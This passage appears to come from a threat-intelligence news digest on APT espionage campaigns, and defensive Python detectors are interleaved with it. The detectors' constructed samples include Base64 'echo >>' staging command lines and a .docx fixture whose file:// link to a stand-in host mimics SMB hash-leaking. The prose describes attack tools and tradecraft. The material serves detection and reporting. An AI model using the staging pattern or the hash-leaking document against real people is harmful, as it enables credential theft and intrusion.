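def find_chunked_writes(cmdlines, min_chunks=20, min_chunk_len=256, min_share=0.95):
    """Flag files that receive many Base64 appends of one fixed width."""
    lengths_by_file = defaultdict(list)
    for line in cmdlines:
        match = APPEND_RE.search(line)
        if match:
            lengths_by_file[match.group(2).lower()].append(len(match.group(1)))

    findings = []
    for path, lengths in lengths_by_file.items():
        if len(lengths) < min_chunks:
            continue
        # A blob cut at a fixed width yields equal-length chunks except,
        # at most, the last one, so the last append is left out of the vote.
        body = lengths[:-1]
        width, hits = Counter(body).most_common(1)[0]
        if width >= min_chunk_len and hits / len(body) >= min_share:
            total = sum(lengths)
            findings.append({
                "file": path,
                "chunks": len(lengths),
                "chunk_len": width,
                "base64_chars": total,
                "approx_decoded_bytes": total * 3 // 4,
            })
    return sorted(findings, key=lambda item: item["file"])


def build_sample_log():
    """Constructed process command lines; the encoded blob is harmless filler."""
    filler = base64.b64encode(bytes(i % 251 for i in range(100_000))).decode()

    def appends(total_chars, width, path):
        blob = filler[:total_chars]
        return [f"cmd.exe /c echo {blob[i:i + width]} >> {path}"
                for i in range(0, len(blob), width)]

    # 154 appends, 775 characters each except the shorter last one.
    log = appends(153 * 775 + 300, 775, r"C:\Windows\Temp\a.txt")
    # 128 appends of 1024 characters.
    log += appends(128 * 1024, 1024, r"C:\ProgramData\b.txt")
    # Ordinary administrative noise that must not be flagged.
    log += [r"cmd.exe /c echo done >> C:\build\status.log"] * 3
    return log


if __name__ == "__main__":
    for finding in find_chunked_writes(build_sample_log()):
        print(finding)
```

The two figures from the text also bound the payload size: 154 chunks of 775 characters are at most 119,350 Base64 characters, or roughly 89 KB once decoded.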

"Despite the protection of the CloudFlare cloud service, which hides the real addresses of servers, the Threat Intelligence system has identified the backends of APT41 servers, which allows us to monitor the malicious infrastructure of attackers and quickly block their servers," Group-IB adds.

An important finding by Group-IB about the group's use of Cobalt Strike is the use of listeners with custom SSL certificates. They are needed to accept connections from the payload, for communication between the bots and the command center. In this case, APT41 used unique SSL certificates that mimic Microsoft, Facebook and Cloudflare. According to Group-IB, servers with such certificates began to appear from the beginning of 2020, and their number at the end of 2021 was 106. This means that researchers have noticed more than 100 Cobalt Strike servers that are used only by this group of attackers. Most of them are no longer active. All attacker infrastructure data and indicators of compromise are automatically sent to the Group-IB Managed XDR system as part of a single Unified Risk Platform, which makes it possible to detect threats and cyber attacks at an early stage.

By investigating malicious APT41 campaigns dating back to 2021, analysts at Group-IB Threat Intelligence managed to align all of the attackers' timestamps to UTC+8. This made it possible to establish that the group's main working time begins at 9 am and ends closer to 7 pm. A number of countries lie in the attackers' time zone, including China, Malaysia, Singapore, and parts of Russia and Australia.
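The working-hours analysis described above, as an added example (not Group-IB's method or data): for each candidate UTC offset it counts how many activity timestamps fall inside a 09:00 to 19:00 local window and returns every offset that fits best. The timestamps are constructed, and the window bounds are taken from the hours quoted in the text.

```python
from datetime import datetime, timedelta, timezone

# Constructed UTC timestamps of operator activity (not data from the report).
SAMPLE_UTC = [
    "2021-03-01T01:05:00+00:00", "2021-03-01T02:40:00+00:00",
    "2021-03-01T04:15:00+00:00", "2021-03-01T07:30:00+00:00",
    "2021-03-01T10:50:00+00:00", "2021-03-02T01:20:00+00:00",
    "2021-03-02T03:00:00+00:00", "2021-03-02T06:45:00+00:00",
    "2021-03-02T09:10:00+00:00", "2021-03-02T10:30:00+00:00",
    "2021-03-03T01:55:00+00:00", "2021-03-03T05:25:00+00:00",
    "2021-03-03T08:00:00+00:00",
    "2021-03-03T15:10:00+00:00",  # late-evening outlier
]


def parse(timestamps):
    """Turn ISO 8601 strings with an explicit offset into aware datetimes."""
    return [datetime.fromisoformat(ts) for ts in timestamps]


def in_window_count(events, offset_hours, start_hour=9, end_hour=19):
    """Number of events whose local hour lies in [start_hour, end_hour)."""
    tz = timezone(timedelta(hours=offset_hours))
    return sum(1 for ev in events if start_hour <= ev.astimezone(tz).hour < end_hour)


def best_offsets(events, start_hour=9, end_hour=19):
    """Return (offsets that fit best, events inside the window at that fit).

    Several offsets are returned when they tie, which happens when the
    activity does not reach both edges of the working day.
    """
    counts = {off: in_window_count(events, off, start_hour, end_hour)
              for off in range(-12, 15)}
    top = max(counts.values())
    return [off for off in sorted(counts) if counts[off] == top], top


def local_hour_histogram(events, offset_hours):
    """Events per local hour at the given offset, for eyeballing the workday."""
    tz = timezone(timedelta(hours=offset_hours))
    hist = {}
    for ev in events:
        hour = ev.astimezone(tz).hour
        hist[hour] = hist.get(hour, 0) + 1
    return dict(sorted(hist.items()))


if __name__ == "__main__":
    events = parse(SAMPLE_UTC)
    offsets, inside = best_offsets(events)
    print("best UTC offsets:", offsets, "events in window:", inside, "of", len(events))
    print("local-hour histogram:", local_hour_histogram(events, offsets[0]))
```

The result is an offset, not a country: as the text notes, several countries share UTC+8, so this kind of evidence only narrows attribution when combined with other artifacts.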

As attribution elements, the report lists mainly the Chinese IP addresses used to access the Cobalt Strike servers. It also notes the use of Chinese characters on the workstations from which the attacks were carried out. Interestingly, the researchers noticed the use of a specific Pinyin format for directory names (Pinyin is a way of writing Chinese sounds in Latin script).

APT attack on telecommunications company in Kazakhstan investigated

In October 2021, one of Kazakhstan's telecommunications companies turned to Doctor Web with a suspicion that malware was present in its corporate network. During the initial inspection, backdoors were found that had previously been used only in targeted attacks. Doctor Web announced this on March 24, 2022. During the investigation, it was established that the compromise of the company's internal servers began back in 2019. For several years, the attackers' main tools were BackDoor.PlugX.93 and BackDoor.Whitebird.30, the Fast Reverse Proxy (FRP) utilities, and RemCom.

Thanks to a mistake by the hackers, we got the opportunity to study the lists of victims and also found out which backdoor management tools were used. Based on the information obtained, we can conclude that the hacker group specialized in compromising the mail servers of Asian companies with Microsoft Exchange software installed. However, there are victims from other countries as well, including:

The logs collected along with the control server included victims infected from August 2021 to early November of the same year. In some cases, BackDoor.Whitebird.30 was installed not only on a server with Microsoft Exchange, but also on domain controllers.

Based on the tools, methods and infrastructure used, it was concluded that the hacker group Calypso APT is behind the attack.

The control server for BackDoor.Whitebird.30 is called Remote Rover. It allows you to remotely launch applications, update the configuration of the backdoor, and download and upload files. In addition, you can use the command shell through Remote Rover.

[Image: the Remote Rover control server interface]

The Remote Rover was accompanied by a CFG\default.ini configuration file with the following content: E:\个人专用\自主研发远程\2021\RR\配置备份\telecom.cfg OneClock.exe

If you translate the content from Chinese into English, you can get the following path: E:\personal use\Independent research and development remote\2021\RR\Configuration backup\telecom.cfg

Detailed technical descriptions of detected malware are found in the PDF version of the study and in the Dr.Web virus library.

  • BackDoor.Siggen2.3622
  • BackDoor.PlugX.93
  • BackDoor.Whitebird.30
  • Trojan.Loader.891
  • Trojan.Loader.896
  • Trojan.Uacbypass.21
  • Trojan.DownLoader43.44599

During the investigation of the targeted attack, Doctor Web virus analysts found and described several backdoors and trojans. The attackers managed to remain unnoticed for as long as in other incidents related to targeted attacks. The hacker group compromised the telecommunications company's network more than two years ago.

Iranian APT groups began to attack the IT sector more often

Iranian APT groups began to attack the IT sector more often. This became known on November 19, 2021.

Most of the attacks target Indian companies, as well as several companies in Israel and the United Arab Emirates.

According to information security experts from the Microsoft Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU), this activity is part of a more extensive espionage campaign to compromise objects of interest to the Iranian regime. The tech giant sent about 1.6 thousand notifications to more than 40 IT companies, warning of hacking attempts coordinated by Iranian APT.

Most of the attacks target Indian IT service companies, as well as several companies based in Israel and the United Arab Emirates. According to Microsoft, two Iranian hacker groups tracked as DEV-0228 and DEV-0056 successfully hacked the networks of IT companies in Israel and Bahrain in July and September 2021.

In July 2021, the DEV-0228 group hacked the systems of an Israeli IT company that provides business management software. DEV-0228 used its access to the IT company to expand its attacks and compromise downstream customers in the defense, energy and legal sectors in Israel.

In September, DEV-0056 hacked the email accounts of a Bahraini IT company that works with clients of the Bahraini government. DEV-0056 has also compromised various accounts with a partially government-owned organization in the Middle East that provides information and communications technology for the defense and transport sectors. DEV-0056 was in the organization's network at least until October 2021[15].

A third of Russian companies were targeted

On November 9, 2021, Positive Technologies announced that, according to a study it conducted, only one in five organizations uses protection solutions that can actually detect cybercriminals on the network. At the same time, there is a trend toward detecting complex attacks with comprehensive solutions.

Positive Technologies conducted an anonymous survey among information security specialists of companies from nine industries: financial, industrial, public sector, fuel and energy complex, education, telecommunications, healthcare, media and IT. In each area, organizations were found that were subjected to targeted attacks. Most often, financial companies became victims - 44% of cases, enterprises of the fuel and energy complex were in second place - 33%, state institutions close the top three - 29% of cases.

Most often, financial institutions suffered from targeted attacks

Most targeted attacks targeted a specific company, industry, or group of individuals; as a rule, such attacks are carried out after preliminary reconnaissance and collection of information about the victim. These attacks can cause tangible damage and directly affect the work of the organization, including financial results.

According to information security experts, the main goal of hackers during an attack on their companies is to steal valuable information

Respondents noted that as a result of targeted attacks, they most often faced consequences such as infrastructure downtime, disruption of business processes, and destruction or alteration of data.

The main consequence of cyber attacks, according to the survey, is infrastructure downtime

At the same time, most organizations are practically not protected from such threats: they use basic protection tools, and some do not even have antivirus software. Only one company in five has the classes of solutions that focus on detecting an attacker on the network: 28% of respondents have sandboxes, which check files in an isolated virtual environment, and 27% have deep traffic analysis (NTA) systems. Only 15% of respondents use specialized comprehensive solutions.

In the coming years, companies plan to implement systems for deep analysis of NTA and NDR traffic, as well as comprehensive solutions for protecting against targeted attacks

According to the results of the study, Positive Technologies experts see positive shifts: companies understand the need to improve the level of security and plan to expand their arsenal of protective equipment.

"The survey helped us find out how protected an organization is from targeted attacks in different areas, as well as better understand trends in the use of protection tools. We learned that one in five organizations intends to start using the NTA system and comprehensive solutions to protect against targeted attacks. This means that their ability to protect themselves from such threats will increase. Interest in the MITRE ATT&CK matrix is also growing. And if there is a need, it would be advisable to adapt this matrix to the needs of the Russian market," says Natalia Kazankova, senior product marketing manager at Positive Technologies.

The study also revealed that 39% of specialists from IT companies plan to purchase a sandbox to detect complex threats. Industry representatives are going to purchase information security event monitoring systems - SIEM (40%), deep traffic analysis - NTA (36%), file verification in an isolated virtual environment - Sandbox (36%). In the financial industry, 40% of organizations will strengthen protection against targeted attacks using end-to-end solutions, and 27% will use EDR endpoint protection solutions and NGFW firewalls.

According to the survey, 67% of specialists either already use the MITRE ATT&CK knowledge base, developed and maintained by MITRE based on analysis of real-world APT attacks, or plan to use it in their work. With the help of this list of tactics, structured as a visual table with possible techniques indicated for each tactic, information security specialists can track information about current threats, build hypotheses for their proactive detection and effectively protect their companies.

Three Chinese APT groups attacked large telecommunications companies

On August 3, 2021, it became known that a team of cybersecurity researchers Cybereason Nocturnus discovered three malicious cyber espionage campaigns aimed at hacking the networks of large telecommunications companies. Presumably, the attacks are carried out in the interests of China.

The malicious campaign, collectively called DeadRinger, targets companies in Southeast Asia. The attacks are orchestrated by three cybercriminal groups (APTs) allegedly linked to the Chinese government, experts said. This conclusion is based on a comparison of tactics and methods with other well-known Chinese APTs.

The first cyber operation is allegedly related to APT Soft Cell. In a second operation called Naikon, organized at the end of 2020, telecommunications companies were attacked. As the researchers suggest, Naikon may be associated with the military bureau of the People's Liberation Army of China (PLA). The third cyber operation was organized in 2017 by APT27 (also known as Emissary Panda). The criminals used a backdoor that is used to compromise Microsoft Exchange servers.

The hackers' methods included exploiting vulnerabilities in Microsoft Exchange Server, installing the China Chopper web shell, using Mimikatz to steal credentials, and creating Cobalt Strike beacons and backdoors to connect to the C&C server.

In each wave of cyber attacks, the criminals' goal was cyber espionage: collecting confidential information by compromising important business assets, such as billing servers containing Call Detail Record (CDR) data, as well as key network components, including domain controllers, web servers and Microsoft Exchange servers.

In some cases, groups could simultaneously be in the same compromised environment. However, it is unclear whether they worked independently or were all under the leadership of a specific grouping[16].

A series of large-scale cyber attacks on Russian government bodies has been identified

Rostelecom-Solar, a subsidiary of Rostelecom and a national provider of cybersecurity technologies, together with the NCCCI (National Computer Incident Coordination Center, established by the FSB of Russia), identified a series of targeted attacks by professional cyber groups on Russian federal executive authorities. Rostelecom-Solar announced this on May 12, 2021. The hackers' main goal was to completely compromise IT infrastructures and steal confidential information, including documentation from isolated segments and mail correspondence of key employees.

"Based on the complexity of the means and methods used by the attackers, as well as the speed of their work and the level of training, we have reason to believe that this group has resources at the level of a foreign intelligence service. These are highly qualified cybercriminals who could stay inside the infrastructure for a long time and not impersonate themselves. Thanks to joint work with Rostelecom-Solar, we were able to timely identify malicious activities and stop them. Information required to identify this threat in other information resources is sent to all participants of the State system of detection, prevention and elimination of consequences of computer attacks to prevent such incidents from happening again," said Nikolay Murashov, Deputy Director of the National Coordination Center for Computer Incidents (NCCC).

To penetrate the infrastructure, the attackers used three main attack vectors: phishing emails with malicious attachments, exploitation of web vulnerabilities and hacking of the infrastructure of contractors, information about which the hackers collected from open sources, among others. The phishing mailings were preceded by thorough preliminary study, as indicated by the level of their development: the letters were adapted to the specifics of the activities of a particular federal executive authority and contained topics that correlate with the current tasks of the organizations.

Having penetrated the infrastructure, the attackers collected information about the network structure and key services. In order to gain control, they sought to attack the workstations of IT administrators with high access privileges and infrastructure management systems. At the same time, the cybercriminals ensured a fairly high level of secrecy through the use of legitimate utilities, undetected malware and a deep understanding of how the information protection tools installed in the authorities work.

After a complete compromise of the infrastructure, the goal of the attackers was to collect confidential information from all sources of interest to them: mail servers, electronic document management servers, file servers and workstations of managers of various levels.

The identified attacks are distinguished by several characteristic features. First, the malware developed by the cybercriminals used the cloud storages of the Russian companies Yandex and VK (formerly Mail.ru Group) to upload the collected data. The hackers disguised network activity as the legitimate utilities "Yandex Disk" and "Disk-O."

Secondly, at the stage of preparing for attacks, hackers clearly studied the features of the administration of one of the Russian antiviruses and were able to use its legitimate components to collect additional information about the attacked network.

All these specific features of the attack indicate that the attackers conducted thorough preliminary preparation and studied both the specifics of the activities of Russian state authorities and the features of Russian infrastructures.

"Effective counteraction to such cyber groups is possible only with a combination of several factors: extensive experience in ensuring the security of government bodies, an expanded stack of technologies for detecting attacks and a strong expert team capable of 24-hour counteraction of groups," noted Igor Lyapunov, Rostelecom's vice president for information security.

2020

Group-IB recorded 7 previously unknown pro-government groups on the cyber counter map of special services

Group-IB, an international company specializing in the prevention of cyber attacks, investigated the key changes that have occurred in the field of cybercrime in the world and on November 25, 2020 shared its forecasts for the development of cyber threats for 2021.

The outgoing year has shown that increasingly espionage is being replaced by active attempts to destroy infrastructure. Military operations are becoming more explicit, and the emphasis is shifting from espionage to destruction of infrastructure, according to the Group-IB Hi-Tech Crime Trends 2020-2021 report. The arsenal of attackers is actively replenished with tools for attacks on physically isolated networks of critical infrastructure. The obvious target of the attackers is nuclear power. If in 2019 not a single attack was recorded in the public space, then this incident occurred at the nuclear facilities of Iran and India. Another resonant attack was an attempt at sabotage in Israel, where water supply systems were targeted, in which hackers tried to change the level of chlorine. The success of this attack could have resulted in severe water shortages and civilian casualties. At the same time, pro-state groups do not lose interest in the telecommunications sector: during the analyzed period, 11 groups associated with special services showed activity here. The tasks of the attackers are still espionage of telecom operators and attempts to disable their infrastructure. In particular, DDoS attack power records were set: 2.3 TB/s and 809 million packets per second. Interception or leakage of BGP routes remains a significant problem. Nine such incidents have been publicly recorded in the past year.

On the map of the cyber defense race of the special services, the largest number of groups are concentrated in China - 23, in Iran - 8 groups, in North Korea and Russia - 4 groups, in India - 3 groups, in Pakistan and the Gaza Strip - 2 groups. Vietnam, Turkey and South Korea close the anti-rating - one group in each country.

According to the data analyzed by Group-IB, the most attacked region during the reporting period was the Asia-Pacific region, in which pro-government groups from China, North Korea, Iran and Pakistan showed interest: a total of 34 campaigns were carried out in this region. In second place are the European countries (22 campaigns), which were mainly of interest to groups from China, Pakistan, Russia and Iran. This is followed by the Middle East and Africa: 18 campaigns were conducted here, mainly by hackers from Iran, Pakistan, Turkey, China and Gaza. Russia and the USA are the least attacked powers. According to the analysis cited in the report, 15 campaigns were conducted in the United States and 9 in Russia. The composition of the attackers is similar for both countries - mainly groups from China, North Korea and Iran. In Russia, one attack by the special services of Kazakhstan was recorded; the United States was also attacked by hackers from the Gaza Strip and Pakistan.

Analysts also discovered seven previously unknown APT groups, among them: Tortoiseshell (Iran), Poison Carp (China), Higaisa (South Korea), AVIVORE (China), Nuo Chong Lions (Saudi Arabia), as well as Chimera and WildPressure, whose affiliation to any country remains unspecified. In addition, the activity of six groups that had remained unnoticed for the past few years was revealed. This once again shows that APT groups and their sophistication should not be underestimated, Group-IB emphasized.

Dr.Web discovered preparations for a spy attack on Russian fuel and energy complex enterprises

On September 24, 2020, it became known that the developer of information protection tools, Doctor Web, published[17] a study of a phishing campaign that was aimed at Russian enterprises of the fuel and energy complex. The first wave was dated April 2020, the last manifestations of activity occurred in September 2020.

"Dr.Web" discovered preparations for a spy attack on Russian enterprises of the fuel and energy complex. Photo source: ru.ihodl.com

Dr.Web is confident that we are talking about an attempt by one of the Chinese APT campaigns to attack fuel and energy complex enterprises with the aim of cyber espionage. At the same time, the quality of phishing emails was very low.

In April, documents with the .docx extension were sent to employees of a number of enterprises in the fuel and energy complex of Russia under the guise of an updated telephone directory; the documents loaded two images from remote resources.

One of them was downloaded to the user's computer from the server news.zannews.com. It is noteworthy that the domain name is similar to the domain of the anti-corruption media center of Kazakhstan - zannews.kz. On the other hand, the domain used immediately recalled another 2015 campaign known as TopNews, which used the IceFog backdoor and in which the Trojans' control domains had a "news" substring in their names, the company said in a publication.

Experts also noted that when sending letters to various recipients, different request parameters or unique image names were used in the requests for downloading an image. This was probably done in order to collect information to determine the "reliable" addressee, who next time will most likely open the letter. To download the image from the second server, the SMB protocol was used, which could have been done to collect NetNTLM hashes from the computers of the employees who opened the received document.
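A defender-side check for the two behaviours described above, as an added example that is not part of the Dr.Web publication: it lists a .docx file's external relationships and flags resources fetched over SMB (NetNTLM hash exposure) or over HTTP with a per-recipient query string. The sample document is constructed in memory; its host names, file names and the risk labels are assumptions.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted files in production, prefer defusedxml
from urllib.parse import urlsplit

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def classify_target(target):
    """Return (risk, host) for the target of one external relationship."""
    t = target.strip()
    if t.startswith("\\\\"):  # UNC path \\host\share\file: fetched over SMB
        return "smb-auth-leak", t[2:].split("\\", 1)[0].lower()
    try:
        parts = urlsplit(t)
        host = parts.hostname or ""
    except ValueError:
        return "other-external", ""
    scheme = parts.scheme.lower()
    if scheme == "file" and host:  # file://host/share/file also goes out over SMB
        return "smb-auth-leak", host
    if scheme in ("http", "https"):
        # A query string on an auto-loaded resource can identify who opened the file
        return ("http-beacon" if parts.query else "http-remote"), host
    return "other-external", host


def scan_docx(data):
    """Return one finding per external relationship in the .docx given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % PKG_NS):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts are stored inside the archive
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                risk, host = classify_target(rel.get("Target", ""))
                findings.append({
                    "part": part,
                    "type": rel_type,
                    "target": rel.get("Target", ""),
                    "host": host,
                    "risk": risk,
                    # hyperlinks need a click; images, templates etc. load on open
                    "auto_loaded": rel_type != "hyperlink",
                })
    return findings


def build_sample_docx():
    """Constructed sample: a minimal .docx whose hosts and file names are made up."""
    def rel(rid, kind, target, external=True):
        mode = ' TargetMode="External"' if external else ""
        return '<Relationship Id="%s" Type="%s/%s" Target="%s"%s/>' % (
            rid, DOC_NS, kind, target, mode)
    rels = ('<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">' % PKG_NS
            + rel("rId1", "image", "media/image1.png", external=False)
            + rel("rId2", "image", "http://img.example.test/logo.png?id=rcpt-0193")
            + rel("rId3", "image", "file://files.example.test/share/stamp.png")
            + rel("rId4", "hyperlink", "https://example.test/directory")
            + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document xmlns:w='urn:sample'/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_docx(build_sample_docx()):
        if f["auto_loaded"]:
            print("%-14s %-24s %s" % (f["risk"], f["host"], f["target"]))
```

Run at the mail gateway or on quarantined attachments, a hit on `smb-auth-leak` is also a reason to check whether outbound SMB is blocked at the perimeter.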

In June 2020, attackers began to use another domain name - sports.manhajnews.com; subdomains of manhajnews.com have been used in spam mailings since at least the fall of 2019.

A campaign was also launched in June, with another document that contained information on industry development and a modified image download server.

The texts of all these letters clearly indicated that their authors are not native speakers of the Russian language and have an extremely superficial idea of its grammar.

Illustration: drweb.ru

For mailings, however, mailboxes on mail.ru and yandex.ru were used.

In early September 2020, the authors of the campaign switched to more aggressive actions: the spam campaign distributed a Word document that already contained a malicious macro. Its task was to deliver a simple loader to the victim's computer, which can receive and run shellcode from the control server. Ultimately, Dr.Web specialists identified two types of backdoors that reached the victims in this way: the previously unknown BackDoor.Siggen2.3238 and the already familiar BackDoor.Whitebird, which was previously used in attacks on a state institution in Kazakhstan.

An analysis of documents, malware, and the infrastructure used allows us to say with confidence that the attack was prepared by one of the Chinese APT groups. Given the functionality of backdoors that are installed on victims' computers in the event of a successful attack, infection leads to at least theft of confidential information from the computers of the attacked organizations. In addition, a very likely scenario is to install specialized Trojans on local servers with a special function, such as domain controllers, mail servers, Internet gateways, etc., the publication "Dr.Web" says.

It is difficult to imagine a person in his right mind, whose letters sent out as part of these campaigns would not arouse suspicion and grin at the same time. On the other hand, attachments to such letters can be opened inadvertently, and this is the only thing, perhaps, that campaign operators could calculate this time. With all the curiosity of these attacks, the problem with attempts to hack strategic enterprises is extremely acute. And even such inept, at first glance, attacks can be an alarming sign - next time phishing messages can be written in the ideal Russian language and indicating the names, surnames and positions of real employees of the attacked organization.

RedCurl group attacked dozens of targets from Russia to North America to steal corporate data

On August 13, 2020, Group-IB presented an analytical report on the previously unknown hacker group RedCurl, specializing in corporate espionage. In less than 3 years, RedCurl has attacked dozens of targets from Russia to North America. The group, presumably consisting of Russian-speaking hackers, conducts carefully planned attacks on private companies in various industries using unique tools. The purpose of the attackers is documents representing trade secrets and containing personal data of employees. Corporate espionage in order to compete is a rare phenomenon on the hacker scene as of August 2020, but the frequency of attacks suggests that it is likely to become further widespread.

Victims of cyber espionage by hacker group RedCurl

Group-IB first revealed the tactics, tools and infrastructure features of the RedCurl group. A document available on the company's website provides a detailed description of the attack chain prepared by specialists from the Group-IB Computer Forensics Laboratory and data collected during the response to incidents attributed to RedCurl campaigns.

According to the company, the RedCurl group, discovered by F.A.C.C.T. Threat Intelligence experts, has been active since at least 2018. During this time, it carried out 26 targeted attacks exclusively on commercial organizations. Among them are construction, financial, consulting companies, retailers, banks, insurance, legal and travel organizations. RedCurl does not have a clear geographical reference to any region: its victims were located in Russia, Ukraine, Great Britain, Germany, Canada and Norway.

The group acted as covertly as possible to minimise the risk of detection on the victim's network. In all campaigns, RedCurl's main goal was to steal confidential corporate documents - contracts, financial documents, personal files of employees, documents on court cases, construction of facilities, etc. All this may indicate the custom nature of RedCurl attacks aimed at unfair competition.

It is noteworthy that one of the likely victims of the group was an employee of an information security company that provides customers with protection against such attacks. In total, Group-IB was able to identify 14 organizations that were victims of espionage by RedCurl. Some were attacked several times. Group-IB specialists contacted each affected organization. A number of them are responding.

The earliest known RedCurl attack was recorded in May 2018. As with all of the group's future campaigns, the primary vector was an elaborate phishing email. The group examines in detail the infrastructure of the target organization; each letter is drawn up not just for the victim organization, but for a specific team within it. Most often, the attackers sent their letters on behalf of the HR department. As a rule, the attack went to several employees of the same department in order to reduce their vigilance, for example, everyone received the same newsletter for annual bonuses. The phishing letter is compiled as well as possible - it includes a signature, logo, fake domain name of the company. Group-IB Threat Intelligence experts emphasize that RedCurl's approach resembles sociotechnical attacks by pentest specialists, in particular, Red Teaming (a service to test the organization's ability to repel complex cyber attacks using methods and tools from the arsenal of hacker groups).

To deliver the payload, RedCurl uses archives, links to which are placed in the body of the letter and lead to legitimate cloud storages. The links are disguised so that the user does not suspect that by opening an attachment with a bonus document allegedly from the official website, he initiates the deployment on the local network of a Trojan controlled by the attackers through the cloud. The Trojan loader is the attackers' pass into the target system: it installs and runs the rest of the malware modules. Like all of the group's own toolkit, the dropper was written in PowerShell.

RedCurl's main goal is to steal documentation and corporate correspondence from the victim's infrastructure. Once on the network, attackers scan a list of folders and office documents available from an infected machine. Information about them is sent to the cloud, and the RedCurl operator decides which folders and files to upload. In parallel, all files found on network disks with the extensions *.jpg, *.pdf, *.doc, *.docx, *.xls, *.xlsx were replaced with shortcuts in the form of modified LNK files. When another user opens such a file, RedCurl.Dropper starts. Thus, RedCurl infects more machines within the victim organization and moves through the system.
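A sweep of a file share for the replacement described above, as an added example that is not taken from the Group-IB report: it looks for genuine shell link files named like documents and notes whether the document they stand in for is gone. It assumes the shortcut keeps the document's name with `.lnk` appended (Explorer hides that extension); the sample tree is constructed.

```python
import os

# Extensions the text above lists as replaced on network disks
DOC_EXTS = {".jpg", ".pdf", ".doc", ".docx", ".xls", ".xlsx"}
# Shell link header: HeaderSize 0x0000004C followed by the fixed LinkCLSID
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")


def is_shell_link(path):
    """True if the file starts with a shell link header, whatever its name says."""
    try:
        with open(path, "rb") as fh:
            return fh.read(len(LNK_MAGIC)) == LNK_MAGIC
    except OSError:
        return False


def find_disguised_shortcuts(root):
    """Find real .lnk files named like documents, e.g. 'bonus.pdf.lnk'."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        present = {f.lower() for f in files}
        for name in files:
            stem, ext = os.path.splitext(name)
            if ext.lower() != ".lnk":
                continue
            if os.path.splitext(stem)[1].lower() not in DOC_EXTS:
                continue
            path = os.path.join(dirpath, name)
            if not is_shell_link(path):
                continue
            findings.append({
                "path": path,
                # a shortcut standing where the document used to be is the stronger signal
                "original_missing": stem.lower() not in present,
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree(root):
    """Constructed sample share: file names and contents are made up."""
    files = {
        "hr/bonus.pdf.lnk": LNK_MAGIC + b"\x00" * 60,   # shortcut, document gone
        "finance/plan.xlsx": b"PK\x03\x04 sample",       # document still present
        "finance/plan.xlsx.lnk": LNK_MAGIC + b"\x00" * 60,
        "it/console.lnk": LNK_MAGIC + b"\x00" * 60,      # ordinary shortcut
        "it/readme.doc.lnk": b"not a shell link",        # name only, wrong header
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for f in find_disguised_shortcuts(tmp):
            print(f["original_missing"], os.path.relpath(f["path"], tmp))
```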

Also, attackers seek to obtain credentials from email. To do this, they use the LaZagne tool, which extracts passwords from memory and from files saved in the victim's web browser. If the required data cannot be obtained, RedCurl uses a Windows PowerShell script that shows the victim a Microsoft Outlook phishing pop-up window. As soon as access to the victim's email is obtained, RedCurl analyzes and uploads all documents of interest to their cloud storage.

In the course of responding to incidents related to the RedCurl group, Group-IB DFIR specialists found out that after receiving the initial access, the attackers stay on the victim's network for 2 to 6 months. The RedCurl.Dropper Trojan, like the rest of the group's tools, does not connect directly to the attackers' command server. Instead, all interaction between the victim's infrastructure and the attackers takes place through legitimate cloud storage, such as Cloudme, koofr.net, pcloud.com and others. All commands are given in the form of PowerShell scripts. This allows RedCurl to remain invisible to traditional defenses for a long time.

"Corporate espionage as an element of unfair competition is, as of August 2020, a rather rare phenomenon in the APT world. For RedCurl, there is no difference in who to attack: a Russian bank or a consulting company in Canada. Such groups specialize in corporate espionage, using techniques to hide their activity, including by using legitimate tools that are difficult to detect. The contents of other people's letters are much more valuable to them than the contents of other people's wallets. Despite the lack of direct financial damage, as in the case of financially motivated cyber-criminal groups, the consequences of espionage activities can run into tens of millions of dollars," said Rustam Mirkasymov, Head of Dynamic Malware Analysis at Group-IB.

As of August 2020, Group-IB continues to record RedCurl attacks in different countries of the world.

Study of APT attacks on government agencies in Kazakhstan and Kyrgyzstan

In March 2019, a client from a state institution of the Republic of Kazakhstan contacted Doctor Web about malware on one of the computers on the corporate network. Dr.Web reported this to TAdviser on July 22, 2020. This appeal led to the start of an investigation, as a result of which the company's specialists discovered and for the first time described a group of Trojan programs used for a full-scale targeted attack on the institution. The materials at Dr.Web's disposal made it possible to get an idea of the tools and targets of the attackers who penetrated the internal computer network. The investigation found that the institution's network infrastructure had been compromised since at least December 2017.

"Dr.Web" studied targeted cyber attacks on state institutions of Kazakhstan and Kyrgyzstan

In addition, in February 2020, representatives of the state institution of the Kyrgyz Republic contacted Doctor Web with signs of infection of the corporate network. The Dr.Web examination established the presence of a number of malicious programs on the network, some modifications of which were also used in the attack on the organization in Kazakhstan. The analysis showed that, as in the previous case, the infection began long before the appeal - in March 2017.

Considering that the unauthorized presence in both infrastructures continued for at least three years, and that completely different families of Trojan programs were identified when examining reports from servers, Dr.Web admits that several hacker groups may be behind these attacks at once. At the same time, some of the Trojans used are well known: some of them are tools of well-known APT groups, the other part is used by various APT groups in China.

The company managed to study in detail information from several intranet servers belonging to the affected institutions of Kazakhstan and Kyrgyzstan. All devices considered in the study run Microsoft Windows operating systems.

Malware that was used in a targeted attack can be roughly divided into two categories:

  • mass, which were installed on most computers of the network;
  • specialized ones that were placed on servers of particular interest to the attacker.

